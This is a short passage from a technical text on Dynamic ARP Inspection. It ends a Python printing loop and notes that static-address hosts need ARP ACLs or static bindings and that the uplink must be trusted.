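    for k, v in scenario()[0].items():
        print(k, v)
```

Two operational points follow from the model: hosts with static addresses have no DHCP binding and need an ARP ACL (or a static binding) or DAI will drop their ARPs, and the uplink must be trusted, because the gateway's own ARP replies have no binding either.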